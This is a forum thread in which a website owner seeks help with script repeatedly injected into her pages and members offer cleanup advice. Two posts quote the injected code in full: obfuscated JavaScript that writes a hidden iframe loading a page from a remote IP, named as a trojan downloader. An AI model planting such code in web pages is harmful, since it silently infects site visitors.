SitePoint Sponsor

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 25 of 28
  1. #1
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Script included automatically

    My website url is : http://www.dreamdezigns.com

    It has some script included automatically,which is not in my local files.

    My clients suggest this as virus,and ask me to scan local files with anti virus software and upload.

    But there is no any threat found in my local files,so some suggest the virus may be in the server and ask the webhost for virus scan.

    The webhost also scanned and they said there is no other virus.

    But even my website have scripts included automatically in the source when viewed in browser.

    Please suggest me the solution.

    Subathra.R

  2. #2
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Arrow

    Hello madam, we I too face the same problem...now the step we have taken is to write protect the files and re upload after cleaning the included junk piece of code..and changed the ftp password..but its the least step..

    From the forums i came to the understanding that form fields have to be properly validated and inclusion of any new scripts may also cause this problem.. for more details refer the link

    en.wikipedia.org/wiki/Code_injection

    In case you get a better solution, plz let me knw to gameshah at gmail.com

  3. #3
    SitePoint Guru SSJ's Avatar
    Join Date
    Jan 2007
    Posts
    830
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Yes we can say this as Code Injection but will you please let me know what kind of script you got included?

  4. #4
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The Script included in my site is given below,

    <script>
    <!--
    var d=document,kol=561;
    function O10H4893EBC339B93(H4893EBC339FA4){ function H4893EBC33A3A1() {return 16;} return( parseInt(H4893EBC339FA4,H4893EBC33A3A1()));}function H4893EBC33AB9D(H4893EBC33AF94){ var H4893EBC33B390='';for(H4893EBC33BBA3=0; H4893EBC33BBA3<H4893EBC33AF94.length; H4893EBC33BBA3+=2){ H4893EBC33B390 += ( String.fromCharCode (O10H4893EBC339B93(H4893EBC33AF94.substr(H4893EBC33BBA3, 2))));}return H4893EBC33B390;} document.write(H4893EBC33AB9D('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313238363232292B2732356263386639635C272077696474683D323931206865696768743D343432207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>

    It was becoming very big problem for my site.

    Subathra.R

  5. #5
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    FYI When your site is visited..it says the virus name as Trojan-Downloader.JS.Agent.ciw

  6. #6
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Report this virus name to your webhost to take futher step from their side

  7. #7
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Oh...

    But i didnt get any virus notification.

    How to rid of this virus?

    Suggest me

    Subathra.R

  8. #8
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Arrow

    Plz refer to the link

    http://www.f-secure.com/v-descs/troj..._agent_d.shtml

    Method 1
    It has got the method to remove the malware. I hope this method lets you clean if at all your system is infected with malware..But after performing this step and the fsecure did not find any malware in your system, then report with the name of the malware to your ISP

    Method 2
    Replace the online files with the backup files that is free from the script you have mentioned below. Also i see in the source of your index page there is an attribute called content="LXHLASJDFLJKAKL." something like that..if thaz not necessary remove that too...

    Any ways do not fail to inform this to your isp to get their suggestion

  9. #9
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Also refer this link....must be useful in solving this issue.

  10. #10
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

  11. #11
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Still i am getting the script included automatically.

    I asked the webhost with the virus you mentioned,but they scanned the files and said there is no any other virus in the server.

    In the local files also i didnt notify with that virus.

    So what shall i do?

    I am not well versed in php.

    Subathra.R

  12. #12
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Now i checked your site in 2 of the systems here. I did not receive any pop ups as before. Could you clear your private data, cookies, temp files etc and try once more.?
    As far as i checked in your view > source, i couldnt find the above mentioned code posted by you. Could you copy and paste the full source as you find it once again ?

    Another option is to subscribe in www.expertsexchange.com to find a solution...Since its a paid service (but affordable) there would be active response provided, you need to search for similar problem as you face.

  13. #13
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    OOps the link is www.experts-exchange.com

  14. #14
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    oh..its pleasure..there is no virus...

    But i upload the index page without that script today morning.so it may be the reason the source doesn't have the script.

    Yesterday also i did the same but evening the source was included automatically.

    We have to wait for sometime,if the script was not included means,its good.
    Otherwise i have to do something else.

    Subathra.R

  15. #15
    secure webapps for all Aleksejs's Avatar
    Join Date
    Apr 2008
    Location
    Riga, Latvia
    Posts
    755
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hi, subathraramasami!
    So what I gather from what you told is that:
    you contacted hosting provider and they said - everything is fine;
    you uploaded a fresh index.php and that is it.

    You have not found a way, how your files got infected with that virus. You are still at risk, though. Because that trojan could infect you again. You should find out how/why that was possible.

  16. #16
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hey again i got that script included automatically.

    <script>
    <!--
    var d=document,kol=561;
    function O10H4898E45C60F4D(H4898E45C61745){ function H4898E45C61F48() {return 16;} return( parseInt(H4898E45C61745,H4898E45C61F48()));}function H4898E45C62B23(H4898E45C62F1A){ function H4898E45C63B10() {return 2;} var H4898E45C63316='';for(H4898E45C63717=0; H4898E45C63717<H4898E45C62F1A.length; H4898E45C63717+=H4898E45C63B10()){ H4898E45C63316 += ( String.fromCharCode (O10H4898E45C60F4D(H4898E45C62F1A.substr(H4898E45C63717, H4898E45C63B10()))));}return H4898E45C63316;} document.write(H4898E45C62B23('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323538393038292B27375C272077696474683D363736206865696768743D333833207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>

    And you said that the trojan can again infect the site.

    Still i didnt know the reason of the happenings

    Day by day its becoming very big problem for me

    Subathra.R

  17. #17
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Question

    Show this attached image as proof to you web hosting providers to show that the site has malware script..Lets c what do they say...and have you changed your ftp password....And write protected the html files and re uploaded ?
    Attached Images Attached Images

  18. #18
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ya,i changed the ftp password and i set the chmod as 755 only.

    And also i send that screenshot send by you to my webhost and see.

    Subathra.R

  19. #19
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I have send one private message. Plz check that too.

  20. #20
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ya i saw that...

    Thank you very much

    Subathra.R

  21. #21
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    And also the write permission 755 is ok?

    Unless what would be the best chmod?

    Subathra.R

  22. #22
    SitePoint Addict
    Join Date
    Aug 2008
    Location
    Coimbatore- India
    Posts
    247
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    As of now, no idea on that. If the problem persists, then shall think of tightening the write permission further more....

  23. #23
    SitePoint Member
    Join Date
    Aug 2008
    Posts
    8
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Witch browser are you using? Witch virusscanner?
    I tried your site with Firefox 2.0.x en AVG 8.0 free and looks great. It could be a combination of these things. Are you using an Visual PHP editor?

    There are many too factors in it.

  24. #24
    SitePoint Enthusiast subathraramasami's Avatar
    Join Date
    Jul 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ok stylesha thanks,We will wait and see the response for write protection.

    Hai jkuiper,

    Just now i upload all the files,so it may not contain any virus notification.

    the browser used is IE 6

    U please see some rply before sent by stylesha with the virus notification thumbnail.

    I didnt use any php editors.

    Subathra.R

  25. #25
    SitePoint Member
    Join Date
    Aug 2008
    Posts
    8
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Off course I read all the replies before I answere.
    But as I say there are many factors to it.
    I tested you site also with IE7 without problems. I also can't reproduce your problem here.

    So my question is still here. Test your website with another browser.
    If you run your site locally, you still has that problem? If it is, it's really a problem of your provider what stylesha told you.

    Look further and do not focus on one point is my opinion.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •